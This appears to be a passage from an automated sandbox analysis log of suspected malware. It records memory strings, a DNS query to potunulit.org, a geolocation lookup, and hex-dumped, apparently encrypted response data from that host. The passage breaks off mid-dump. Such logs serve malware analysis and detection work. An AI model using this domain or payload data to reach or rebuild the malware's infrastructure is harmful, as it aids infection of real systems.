Source: ngentask.exe, 0000000C.00000002.581410374.00000000032F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id1Responsel
Source: ngentask.exe, 0000000C.00000002.581410374.00000000032F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id2
Source: ngentask.exe, 0000000C.00000002.581410374.00000000032F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id20
Source: ngentask.exe, 0000000C.00000002.581410374.00000000032F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id20Responsel
Source: ngentask.exe, 0000000C.00000002.581410374.00000000032F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id21
Source: ngentask.exe, 0000000C.00000002.581410374.00000000032F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id21Responsel
Source: ngentask.exe, 0000000C.00000002.581410374.00000000032F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id22
Source: ngentask.exe, 0000000C.00000002.581410374.00000000032F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id22Responsel
Source: ngentask.exe, 0000000C.00000002.581410374.00000000032F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id2Responsel
Source: ngentask.exe, 0000000C.00000002.581410374.00000000032F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id3
Source: ngentask.exe, 0000000C.00000002.581410374.00000000032F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id3Responsel
Source: ngentask.exe, 0000000C.00000002.581410374.00000000032F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id4
Source: ngentask.exe, 0000000C.00000002.581410374.00000000032F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id4Responsel
Source: ngentask.exe, 0000000C.00000002.581410374.00000000032F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id5
Source: ngentask.exe, 0000000C.00000002.581410374.00000000032F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id5Responsel
Source: ngentask.exe, 0000000C.00000002.581410374.00000000032F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id6
Source: ngentask.exe, 0000000C.00000002.581410374.00000000032F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id6Responsel
Source: ngentask.exe, 0000000C.00000002.581410374.00000000032F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id7
Source: ngentask.exe, 0000000C.00000002.581410374.00000000032F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id7Responsel
Source: ngentask.exe, 0000000C.00000002.581410374.00000000032F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id8
Source: ngentask.exe, 0000000C.00000002.581410374.00000000032F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id8Responsel
Source: ngentask.exe, 0000000C.00000002.581410374.00000000032F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id9
Source: ngentask.exe, 0000000C.00000002.581410374.00000000032F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id9Responsel
Source: ngentask.exe, 0000000C.00000002.581410374.00000000033E6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/V
Source: 43D0.exe, 0000000A.00000002.481185705.0000000000400000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://www.openssl.org/support/faq.html
Source: 43D0.exe, 00000008.00000002.479914181.0000000004980000.00000040.00001000.00020000.00000000.sdmp, 43D0.exe, 0000000A.00000002.481185705.0000000000400000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://api.2ip.ua/geo.json
Source: C4AA.exe, 00000009.00000003.485078968.000000000DF30000.00000004.00001000.00020000.00000000.sdmp, C4AA.exe, 00000009.00000003.490022034.000000000DF32000.00000040.00001000.00020000.00000000.sdmp, C4AA.exe, 00000009.00000002.573780441.000000000128B000.00000004.00000020.00020000.00000000.sdmp, ngentask.exe, 0000000C.00000002.572420134.0000000000402000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://api.ip.sb/ip
Source: unknown DNS traffic detected: queries for: potunulit.org
Source: global traffic HTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown Network traffic detected: HTTP traffic on port 49737 -> 443
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Jan 2023 08:28:11 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2Fih9XRZVfiHb6ul5lDe89E96SyIR%2B8f8Z05%2BaTBePa9Sxmz3Wr50lxG68ZyAwNwaaVf5qg7yvvxrt56vC4ZRnB%2BVkX4C8ZLJHmFe47CsFxNy%2FMwhQCasP1k3e6S1nuQU"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 78efa24c791e9b2d-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 37 0d 0a 03 00 00 00 1f 3d 53 0d 0a Data Ascii: 7=S
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Jan 2023 08:28:11 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=EDSp5MowyujsafEdpguYy7bJLZ51FtpeE2S33L5xlU0bVdcA5%2FWFoCLEbpKtJiVcQ0MWs5QhCB%2FyebFjp4q%2Bup9lZsvFb0GjshaOPbMzOB1E%2F88CeRtfq9FSMzkt60gE"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 78efa24d6ab59b2d-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 33 37 61 66 0d 0a 00 00 b4 60 fb d4 0e 1a 40 10 16 30 80 b7 2c 78 84 4f ad 7d f5 71 b1 34 b2 96 20 c3 49 91 4a 25 39 57 90 06 64 04 ec 38 49 6b 19 b1 cd e4 dc b5 44 a4 06 4a 38 50 87 d2 d9 c3 3e 08 a2 13 f5 8e e2 e3 07 97 8a 06 9e 8f f1 83 0e 25 a6 79 5e 5c 95 03 0f 2e 0e 4b 69 e1 d9 a0 6a 7d ec 53 2e 3b 76 4b 12 73 36 18 28 a6 70 a3 d1 5f 36 6b 85 29 7c f2 c6 e6 70 95 06 7c 93 74 5d b9 53 68 47 8f 2a f5 96 a5 d1 a6 8f 3a c7 cf 23 6a 3c 03 ff f9 e0 c0 64 6b 52 e1 32 c7 0d c9 f7 df c9 42 d2 09 e6 00 c6 04 25 76 13 21 82 77 a3 10 10 0f 50 0b 84 cd 01 1c 6d 4c 66 58 e8 1b 3d eb 35 ee de 80 0e 70 06 30 12 95 c5 c8 98 66 73 fd 10 68 f5 6b cc e3 bf 6c 13 d9 1e 1c 8d 79 33 4f 62 3e 15 21 0b 5a a3 06 93 3a 56 3f cb 00 73 fb 42 15 9b 06 54 53 51 3a 05 fc 1d 09 52 2b e5 8d 83 7b 9e 45 f5 fe 73 8c 5c db c4 ff 13 13 bf 92 e4 92 24 08 4f c5 7c e7 cb a1 61 6e de f5 69 a9 18 17 7e 5f ef 9a a5 54 c9 a0 c1 bb dd 7a 08 90 4e 19 e0 2c 95 a9 1d 1a f5 96 be 25 51 61 9a 04 38 7c 88 2c c8 48 69 70 c6 4a 98 03 fd 6c 9e aa 6b ac 87 3f bd 61 0d c0 4d bf 46 24 fd f8 12 6c 33 6c 39 7c 0a 8d c7 fd e4 0e a4 eb 7e 71 bf 78 f5 1a 0c 9b 4a d8 19 8e c8 4f 13 f6 80 ae 9c 97 02 4c 75 56 ad f3 57 3b 2a b9 72 ee cc 23 b2 c5 08 31 e5 98 90 f7 0f e4 ec e7 6e 2b 4c 80 d0 12 f9 13 63 11 bb d6 af 31 3c 27 d4 69 b7 9f 33 c9 cc 46 d9 48 15 ac 47 c6 d9 55 7d af ba 68 92 0e ff 9d 7f 7f 55 40 57 74 7b 39 ee e6 ac 04 28 84 42 40 77 9b c7 9b 84 e7 3d 66 f1 8a 64 b1 1d 30 12 51 8c 70 17 4b af 1f ba f6 f6 01 e8 e4 27 af a1 90 4e b1 54 55 a5 7c b7 1b 6f c7 cb 29 32 28 e7 5b 1e 54 ab 1e 26 7d 11 ee e3 ce 57 c3 62 79 e4 6b b5 5c 68 91 7c fc 04 f1 2c 4e af 03 5b 51 1d e4 a6 8b 10 9f 10 b9 d9 b0 99 07 99 8a cd e4 7f 74 39 50 6d 83 e2 d1 fe f3 94 0a 15 d7 ec 8a c3 e0 2b 59 b7 bb 01 7e 17 28 d2 04 45 1f d0 a1 aa 7a 8f f6 6b e3 cd d0 d9 37 40 80 e3 5c e7 47 9c 3c 21 c4 3a 96 9e c9 e7 17 3f dc e1 7e 4d a2 70 d4 03 45 af 98 76 6e 0f ca 82 cf 25 2e 9f 96 ce ec 75 98 c3 e7 23 de ab b6 5f 29 43 43 5f 56 03 62 18 2a 19 f8 40 ae ae 88 c1 76 a2 33 25 7d da a9 c3 e8 c8 2f Data Ascii: 37af`@0,xO}q4 IJ%9Wd8IkDJ8P>%y^\.Kij}S.;vKs6(p_6k)|p|t]ShG*:#j<dkR2B%v!wPmLfX=5p0fshkly3Ob>!Z:V?sBTSQ:R+{Es\$O|ani~_TzN,%Qa8|,HipJ
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Jan 2023 08:28:12 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=PaSUQmFCXQiZ62bGa4o49xj0GsuzztoRdgziCG3KHu0xLUxRRUQmPHUvnUMTX3qcViCUiEHrHOU8I3UFky32DQn8Sfndb09rBhpkOSnLm8aMTnUtcOP2ZuWejbmvZdI8"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 78efa2520a609b2d-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 39 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 70 6f 74 75 6e 75 6c 69 74 2e 6f 72 67 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 191<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at potunulit.org Port 80</address></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Jan 2023 08:28:12 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=bgR2wOy0u9tVXVWMgJqVmojQFe7TPptd7QLwjsfNsgbNWXbSiBtdDuk8K4NHbezpdhqRLODa6YKDfw1lHobbEO%2B5VbPdr5SiV5bk6fs8Qu8%2FU9RSVpliQu%2BYDoXYjc6j"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 78efa2532c3d9b2d-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 37 61 37 33 0d 0a 00 00 b4 60 fb d4 0e 1a 40 10 16 30 80 b7 2c 78 84 4f ad 7d f5 71 b1 34 b2 96 20 c3 49 91 4a 25 39 57 90 06 64 04 ec 38 49 6b 19 b1 cd e4 dc b5 44 a4 06 4a 38 50 87 d2 d9 c3 3e 08 a2 13 fd 8e e2 e3 07 97 8a 06 9e 8f f1 83 0e 25 a6 79 5e 5c 95 03 0f 2e 0e 4b 69 e1 d9 a0 6a 7d ec 53 2e 3b 76 4b 12 73 36 18 28 a6 70 a3 d1 5f 36 6b 85 29 7c f2 c6 e6 70 95 06 7c 93 74 5d b9 53 68 47 8f 2a f5 90 eb 68 9f 89 74 7e f6 25 24 85 3a f9 b7 59 f9 62 25 fa d8 0d 89 b4 f0 f1 91 66 7b bf 47 5f 39 f9 de 64 4f 7a 6f 3b 4e 82 98 d3 36 d5 45 3d f4 19 00 51 75 34 16 51 22 3b a5 92 d7 d8 ce b7 49 00 7e ae ac c3 86 21 5f 36 f8 37 33 f2 25 75 da ed 05 70 b1 17 22 58 4a 33 4f 62 3e 15 21 0b 5a f3 43 93 3a 1a 3e c8 00 ba aa 8f 74 d7 07 53 53 fa cb 1f 9e fd 09 51 2a ee 8c 8a 7b 7e d7 f6 ff 78 d7 d5 d9 c4 0d 13 13 89 66 e1 92 24 18 4f c5 03 11 ca a1 61 7e 9e f5 69 a9 19 17 7e 5d af 9a a0 44 c9 a0 c1 b9 dd 7a 08 90 4e 19 e0 2c 95 a9 18 ba 74 94 be 21 51 61 46 d0 35 7c 8a 28 c8 c8 6b a1 d0 4a 9a 13 fd ec 9e aa 6b ac 87 3f bd 61 0d c0 5d bf 56 34 fd f8 12 6c 33 6c 29 7c 0a 8d eb 6b e5 0e c0 eb 7e 71 eb f0 74 18 38 b7 4a d8 19 ae cc 4f 3b 79 82 ae 9c 97 02 4c 75 56 ad f3 57 3b 2a b9 72 ee cc 23 e2 67 0e 31 65 92 90 f7 df f5 ec e7 72 2b 4c 80 d0 12 f9 13 63 11 bb d6 af 31 3c 27 d4 69 b7 9f bb 93 cc 46 99 48 15 ac af eb d9 55 3d af ba 68 92 1e ff 9d 83 7e 55 40 57 64 7b 39 66 e7 ac 04 28 84 42 40 77 9b c7 9b 84 e7 3d 66 f1 8a 64 b1 33 44 77 29 f8 70 17 4b 65 fa de 8e 82 11 e8 e4 1f cc a0 90 4e a5 54 55 a5 8e b7 1b 6f c3 cb 29 32 28 e7 5b 3e 54 ab 7e 08 19 70 9a a2 ce 57 a3 fc ab fa 1d d4 ec 69 91 9c 1d 0f f1 2c c8 af 03 5b e5 1f e4 a6 7d 10 9f 10 b9 d9 b0 d9 07 99 4a e3 96 0c 06 1a 50 6d 43 9c 95 8b 8b e1 12 fb d5 9c a6 c3 e0 2b 63 be bb 01 7a 17 28 d2 ae 46 1f d0 a1 aa 7a cf f6 6b a3 cd d0 d9 37 00 80 e3 1c c9 20 f5 52 48 c4 3a 96 4d cb e7 17 3f dc e5 7e 4d a6 70 d4 03 eb ac 98 76 6e 0f ca 82 cf 25 2e 9f 96 ce ec 35 98 c3 a7 0d a8 ca d4 5f 29 43 43 9c 55 03 62 18 3a 1d f8 40 aa ae 88 c1 c4 a1 33 25 7d da a9 c3 e8 c8 2f cb e2 Data Ascii: 7a73`@0,xO}q4 IJ%9Wd8IkDJ8P>%y^\.Kij}S.;vKs6(p_6k)|p|t]ShG*ht~%$:Yb%f{G_9dOzo;N6E=Qu4Q";I~!_673%up"XJ3Ob>!ZC:>tSSQ*{~xf$Oa~i~]DzN,t!QaF5|(
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Jan 2023 08:28:20 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=M7uMaJBPHeyY9GKg%2Fg7YkyxACawcmVOgSR1WzbqjvIp0VD1g6PxbHV%2F2z01onKr2ssIMLk3cX3zkGYxEAo397a6ExuyQnpXgUIlpXT69iDEmPWT1xsCJtahl8g1ux4ci"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 78efa2846af69b2d-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 39 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 70 6f 74 75 6e 75 6c 69 74 2e 6f 72 67 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 191<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at potunulit.org Port 80</address></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Jan 2023 08:28:20 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=mFqif1qzqdphc7%2Fsagwlbzd3Nj4Ho3wUo73DOvIpy79Q%2BA4%2F9pfoWLsJosBeXtKzOkSROVVu9nklvYlEoJ7MN1FfVM%2FRrd2l41ebpHIkmeBkw7JujOYFwB%2BWk8sIn4c7"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 78efa2862dfa9b2d-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 35 62 65 0d 0a 00 00 b4 60 fb d4 0e 1a 40 10 16 30 80 b7 2c 78 84 4f ad 7d f5 71 b1 34 b2 96 20 c3 49 91 4a 25 39 57 90 06 64 04 ec 38 49 6b 19 b1 cd e4 dc b5 44 a4 06 4a 38 50 87 d2 d9 c3 3e 08 a2 13 e5 8e e2 e3 07 97 8a 06 9e 8f f1 83 0e 25 a6 79 5e 5c 95 03 0f 2e 0e 4b 69 e1 d9 a0 6a 7d ec 53 2e 3b 76 4b 12 73 36 18 28 a6 70 a3 d1 5f 36 6b 85 29 7c f2 c6 e6 70 95 06 7c 93 74 5d b9 53 68 47 8f 2a f5 45 f9 be 81 5c 66 a8 e8 f0 36 53 24 2c a5 8f e7 b7 37 3d c6 e6 9b 62 ee 24 83 a6 65 03 55 89 27 15 58 4a 51 ed 7d ed 50 70 4c 7f 28 8d 57 eb ea d2 40 02 6b a6 04 87 3c ee b7 5a c9 0e dc 61 57 d5 6c 7d b2 16 94 f7 41 be f3 79 4f 23 37 a3 c4 29 35 5b a5 cc 40 e2 5e 61 26 01 56 cf 43 b1 4e a3 06 93 3a 56 3f cb 00 23 be 42 15 d7 07 53 53 fa cb 1f 9e 1d 09 52 2b b5 c8 83 7b 32 44 f2 ff 8a f3 9a b8 c4 0d 13 13 bf 1e e1 92 c4 08 4d c4 08 a0 c2 a1 61 d0 cb f5 69 4f 3a 17 7e 5f af 9a ce a0 c9 a0 c1 a9 dd 7a 0d 50 5b 19 e0 2c d5 a9 18 0a f5 96 be 27 51 61 9f d4 3e 7c 88 28 c8 48 6e a1 c0 4a 9a 03 fd ec 9e 7a 42 ac 87 2b bd 61 3f 9b 44 bf 44 34 bd 79 12 6c 23 6c 29 6c 0a 8d c7 fd f4 0e a4 fb 7e 71 eb 80 f5 1a 78 9b 4a d8 19 ae cc 4f 3b 79 82 ae 48 7f 17 4c 25 56 ad f3 57 fb 1c b9 42 53 ce 23 b2 75 0e 31 79 92 90 f7 df 09 f4 e7 ea 3f 4c 80 d0 92 c0 13 ff 0d bb d6 3f f0 29 27 c8 69 b7 9f 33 c9 cc 46 d9 48 15 ac af eb d9 55 3d af ba 68 92 0e ff 9d 7f 7f 55 40 d7 bf 6e 39 26 e7 ac 04 28 84 42 40 77 9b c7 9b 84 27 28 66 91 8b 64 b1 1d 30 12 51 8c 70 17 4b 81 6b df 8e 82 01 e8 e4 1f 5e a1 90 4e a1 54 55 8b fa d2 63 1b c3 cb 29 04 85 f2 5b 1e 44 ab 1e 26 d3 04 ee c3 ca 57 a3 4c 1d 85 1f d4 5c 68 91 9c 29 06 f1 0c 5e ae 63 75 97 7b 85 d2 1c 10 9f da 89 d9 b0 99 c7 8c 8a cd d6 7f 74 79 e2 78 43 cc b9 8b 8b e1 62 7a d7 9c 88 c3 e0 6b a9 b4 fb 2f 1e 76 5c b3 ae 46 1f ec 1b 8a 7a 8f f6 7d e3 cd c0 d9 37 00 64 f6 1c c9 20 f5 52 48 c4 3a 96 4d cb e7 17 7f dc e5 be 63 d4 03 a6 60 eb ac 98 46 d3 0d ca 82 0f 13 2e 9f 28 cc ec 35 6c d6 a7 0d a8 ca d4 5f 29 43 43 9c 55 03 62 58 3a 1d b8 6e d8 cb e4 ae a7 a1 33 f1 34 da a9 c3 68 Data Ascii: 15be`@0,xO}q4 IJ%9Wd8IkDJ8P>%y^\.Kij}S.;vKs6(p_6k)|p|t]ShG*E\f6S$,7=b$eU'XJQ}PpL(W@k<ZaWl}AyO#7)5[@^a&VCN:V?#BSSR+{2DMaiO:~_zP[,'Qa>|(HnJ
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Jan 2023 08:28:23 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=JBK5aG5%2BhecL%2F6fMFpTYTUHGnP1aX6gT1rKVvZ52faPxpehMI84k2wf5ujtEZHugvAzglzmYi7LSKdQbjkTYsffV6BE9zhKiHapbMS8O8NbNXPNvOlv4L2F8QKiiQaBk"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 78efa297dcd19b2d-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 39 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 70 6f 74 75 6e 75 6c 69 74 2e 6f 72 67 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 191<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at potunulit.org Port 80</address></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Jan 2023 08:28:23 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=dIb%2FbzBntbzOkZhS061kRh6WZX7x0NSVVdR89OCmd0nwEJxIud0ucEpvreMYV8tJe7z6ZG%2FLYAqwfB5X1Hjj%2B0G0tiSl4H4DYsPnHQb9vUa5W70AmL6Ds5MIzxnGdcqo"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 78efa2999fd69b2d-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 39 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 